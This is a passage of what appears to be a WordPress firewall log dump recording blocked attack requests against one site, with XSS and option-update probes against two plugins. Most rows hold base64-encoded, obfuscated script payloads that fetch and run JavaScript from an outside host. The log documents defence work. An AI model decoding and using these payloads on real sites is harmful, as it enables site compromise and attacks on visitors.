Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3Jjc3BfZGVzY3JpcHRpb25d\",\"paramValue\":\"PHNjcmlwdCAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhPVN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LypfYWFhYWFhYSovLDExNi8qX2FhYWFhYWEqLywxMTYvKl9hYWFhYWFhKi8sMTEyLyoqLywxMTUvKl9hYWFhYWFhKi8sNTgvKl9hYWFhYWFhKi8sNDcvKl9hYWFhYWFhKi8sNDcvKl9hYWFhYWFhKi8sMTAzLypfYWFhYWFhYSovLDEwOC8qX2FhYWFhYWEqLyw5Ny8qX2FhYWFhYWEqLywxMTUvKl9hYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWEqLyw5OC8qKi8sMTAxLypfYWFhYWFhYSovLDEwOC8qX2FhYWFhYWEqLyw5Ny8qX2FhYWFhYWEqLywxMTYvKl9hYWFhYWFhKi8sMTAxLypfYWFhYWFhYSovLDExNC8qX2FhYWFhYWEqLyw5OC8qX2FhYWFhYWEqLywxMDEvKl9hYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWEqLywxMTUvKl9hYWFhYWFhKi8sMTE2LypfYWFhYWFhYSovLDEwNC8qX2FhYWFhYWEqLywxMDEvKiovLDExNC8qX2FhYWFhYWEqLywxMDEvKl9hYWFhYWFhKi8sNDYvKl9hYWFhYWFhKi8sOTkvKl9hYWFhYWFhKi8sMTExLyoqLywxMDkvKl9hYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWEqLywxMTEvKiovLDk5LypfYWFhYWFhYSovLDk3LypfYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYSovLDEwOC8qX2FhYWFhYWEqLywxMDEvKl9hYWFhYWFhKi8sOTcvKl9hYWFhYWFhKi8sMTE0LypfYWFhYWFhYSovLDQ2LypfYWFhYWFhYSovLDEwNi8qX2FhYWFhYWEqLywxMTUvKl9hYWFhYWFhKi8sNjMpO3ZhciBfYWFhYWFhYSA9IF9hYWFhYWFhKF9hYWFhYWFhKTtpZihfYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYShfYWFhYWFhYSk7fSBmdW5jdGlvbiBfYWFhYWFhYShfYWFhYWFhYSl7IHZhciBfYWFhYWFhYSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO19hYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYSwgZmFsc2UgKTtfYWFhYWFhYS5zZW5kKCBudWxsICk7cmV0dXJuIF9hYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWEodG9kbyl7IHZhciBfYWFhYWFhYSA9IG5ldyBGdW5jdGlvbigneCcsICd5JywgdG9kbysnIHJldHVybiB4K3k7Jyk7X2FhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37643,1569411439.222075,1569411437.255900,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYT1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qX2FhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYSovLDExMi8qKi8sMTE1LypfYWFhYWFhYWEqLyw1OC8qX2FhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYSovLDQ3LypfYWFhYWFhYWEqLywxMDMvKl9hYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhKi8sOTgvKiovLDEwMS8qX2FhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhKi8sOTgvKl9hYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhKi8sMTAxLyoqLywxMTQvKl9hYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYSovLDk5LypfYWFhYWFhYWEqLywxMTEvKiovLDEwOS8qX2FhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhKi8sMTExLyoqLyw5OS8qX2FhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWEqLyw2Myk7dmFyIF9hYWFhYWFhYSA9IF9hYWFhYWFhYShfYWFhYWFhYWEpO2lmKF9hYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWEoX2FhYWFhYWFhKTt9IGZ1bmN0aW9uIF9hYWFhYWFhYShfYWFhYWFhYWEpeyB2YXIgX2FhYWFhYWFhID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7X2FhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWEsIGZhbHNlICk7X2FhYWFhYWFhLnNlbmQoIG51bGwgKTtyZXR1cm4gX2FhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhKHRvZG8peyB2YXIgX2FhYWFhYWFhID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCB0b2RvKycgcmV0dXJuIHgreTsnKTtfYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37637,1569411099.221849,1569411098.339500,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2Nzc10=\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWFhYWFhYT1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qX2FhYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYSovLDExMi8qKi8sMTE1LypfYWFhYWFhYWFhYWFhYWEqLyw1OC8qX2FhYWFhYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhYWFhYSovLDQ3LypfYWFhYWFhYWFhYWFhYWEqLywxMDMvKl9hYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYWFhYWFhKi8sOTgvKiovLDEwMS8qX2FhYWFhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhYWFhKi8sOTgvKl9hYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYWFhYWFhKi8sMTAxLyoqLywxMTQvKl9hYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYWFhYSovLDk5LypfYWFhYWFhYWFhYWFhYWEqLywxMTEvKiovLDEwOS8qX2FhYWFhYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYWFhYWFhKi8sMTExLyoqLyw5OS8qX2FhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhYWEqLyw2Myk7dmFyIF9hYWFhYWFhYWFhYWFhYSA9IF9hYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYWEpO2lmKF9hYWFhYWFhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhYWFhKTt9IGZ1bmN0aW9uIF9hYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYWEpeyB2YXIgX2FhYWFhYWFhYWFhYWFhID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7X2FhYWFhYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhYWFhYWEsIGZhbHNlICk7X2FhYWFhYWFhYWFhYWFhLnNlbmQoIG51bGwgKTtyZXR1cm4gX2FhYWFhYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYWFhYWFhKHRvZG8peyB2YXIgX2FhYWFhYWFhYWFhYWFhID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCB0b2RvKycgcmV0dXJuIHgreTsnKTtfYWFhYWFhYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37677,1569411748.915432,1569411748.067600,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=3',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mw==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37792,1569949676.834155,1569949674.053000,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?action=save&updated=true',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWFhYWFhYWFhPVN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LypfYWFhYWFhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTEyLyoqLywxMTUvKl9hYWFhYWFhYWFhYWFhYWFhKi8sNTgvKl9hYWFhYWFhYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTAzLypfYWFhYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYWFhYWFhYWEqLyw5OC8qKi8sMTAxLypfYWFhYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhYWFhYWEqLyw5OC8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMDEvKiovLDExNC8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYWFhYWFhKi8sOTkvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTExLyoqLywxMDkvKl9hYWFhYWFhYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMTEvKiovLDk5LypfYWFhYWFhYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTE0LypfYWFhYWFhYWFhYWFhYWFhYSovLDQ2LypfYWFhYWFhYWFhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhYWFhYWFhKi8sNjMpO3ZhciBfYWFhYWFhYWFhYWFhYWFhYSA9IF9hYWFhYWFhYWFhYWFhYWFhKF9hYWFhYWFhYWFhYWFhYWFhKTtpZihfYWFhYWFhYWFhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYWFhYSk7fSBmdW5jdGlvbiBfYWFhYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYWFhYSl7IHZhciBfYWFhYWFhYWFhYWFhYWFhYSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO19hYWFhYWFhYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhYWFhYWFhYSwgZmFsc2UgKTtfYWFhYWFhYWFhYWFhYWFhYS5zZW5kKCBudWxsICk7cmV0dXJuIF9hYWFhYWFhYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYWFhYWFhYWEodG9kbyl7IHZhciBfYWFhYWFhYWFhYWFhYWFhYSA9IG5ldyBGdW5jdGlvbigneCcsICd5JywgdG9kbysnIHJldHVybiB4K3k7Jyk7X2FhYWFhYWFhYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37678,1569411746.639782,1569411745.764700,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=2',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37638,1569411095.092935,1569411094.199000,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W290d19wY3RsX2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC90ZXh0YXJlYT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWE9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKl9hYWFhYWEqLywxMTYvKl9hYWFhYWEqLywxMTYvKl9hYWFhYWEqLywxMTIvKiovLDExNS8qX2FhYWFhYSovLDU4LypfYWFhYWFhKi8sNDcvKl9hYWFhYWEqLyw0Ny8qX2FhYWFhYSovLDEwMy8qX2FhYWFhYSovLDEwOC8qX2FhYWFhYSovLDk3LypfYWFhYWFhKi8sMTE1LypfYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYSovLDk4LyoqLywxMDEvKl9hYWFhYWEqLywxMDgvKl9hYWFhYWEqLyw5Ny8qX2FhYWFhYSovLDExNi8qX2FhYWFhYSovLDEwMS8qX2FhYWFhYSovLDExNC8qX2FhYWFhYSovLDk4LypfYWFhYWFhKi8sMTAxLypfYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYSovLDExNS8qX2FhYWFhYSovLDExNi8qX2FhYWFhYSovLDEwNC8qX2FhYWFhYSovLDEwMS8qKi8sMTE0LypfYWFhYWFhKi8sMTAxLypfYWFhYWFhKi8sNDYvKl9hYWFhYWEqLyw5OS8qX2FhYWFhYSovLDExMS8qKi8sMTA5LypfYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYSovLDExMS8qKi8sOTkvKl9hYWFhYWEqLyw5Ny8qX2FhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhKi8sMTA4LypfYWFhYWFhKi8sMTAxLypfYWFhYWFhKi8sOTcvKl9hYWFhYWEqLywxMTQvKl9hYWFhYWEqLyw0Ni8qX2FhYWFhYSovLDEwNi8qX2FhYWFhYSovLDExNS8qX2FhYWFhYSovLDYzKTt2YXIgX2FhYWFhYSA9IF9hYWFhYWEoX2FhYWFhYSk7aWYoX2FhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhKF9hYWFhYWEpO30gZnVuY3Rpb24gX2FhYWFhYShfYWFhYWFhKXsgdmFyIF9hYWFhYWEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtfYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhLCBmYWxzZSApO19hYWFhYWEuc2VuZCggbnVsbCApO3JldHVybiBfYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYSh0b2RvKXsgdmFyIF9hYWFhYWEgPSBuZXcgRnVuY3Rpb24oJ3gnLCAneScsIHRvZG8rJyByZXR1cm4geCt5OycpO19hYWFhYWEoMCwwKTt9PC9zY3JpcHQ+\",\"path\":\"Lw==\",\"category\":\"xss\",\"ssl\":0}'),(37676,1569411751.165596,1569411750.320500,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=test',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"dGVzdA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37644,1569411436.300698,1569411432.480900,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYT1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qX2FhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYSovLDExMi8qKi8sMTE1LypfYWFhYWFhYWEqLyw1OC8qX2FhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYSovLDQ3LypfYWFhYWFhYWEqLywxMDMvKl9hYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhKi8sOTgvKiovLDEwMS8qX2FhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhKi8sOTgvKl9hYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhKi8sMTAxLyoqLywxMTQvKl9hYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYSovLDk5LypfYWFhYWFhYWEqLywxMTEvKiovLDEwOS8qX2FhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhKi8sMTExLyoqLyw5OS8qX2FhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWEqLyw2Myk7dmFyIF9hYWFhYWFhYSA9IF9hYWFhYWFhYShfYWFhYWFhYWEpO2lmKF9hYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWEoX2FhYWFhYWFhKTt9IGZ1bmN0aW9uIF9hYWFhYWFhYShfYWFhYWFhYWEpeyB2YXIgX2FhYWFhYWFhID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7X2FhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWEsIGZhbHNlICk7X2FhYWFhYWFhLnNlbmQoIG51bGwgKTtyZXR1cm4gX2FhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhKHRvZG8peyB2YXIgX2FhYWFhYWFhID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCB0b2RvKycgcmV0dXJuIHgreTsnKTtfYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37679,1569411744.354894,1569411743.446200,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=1',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"MQ==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37680,1569411742.041371,1569411741.263000,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=test',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"dGVzdA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37645,1569411431.553343,1569411430.529400,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?action=save&updated=true',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYT1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qX2FhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYSovLDExMi8qKi8sMTE1LypfYWFhYWFhYWEqLyw1OC8qX2FhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYSovLDQ3LypfYWFhYWFhYWEqLywxMDMvKl9hYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhKi8sOTgvKiovLDEwMS8qX2FhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhKi8s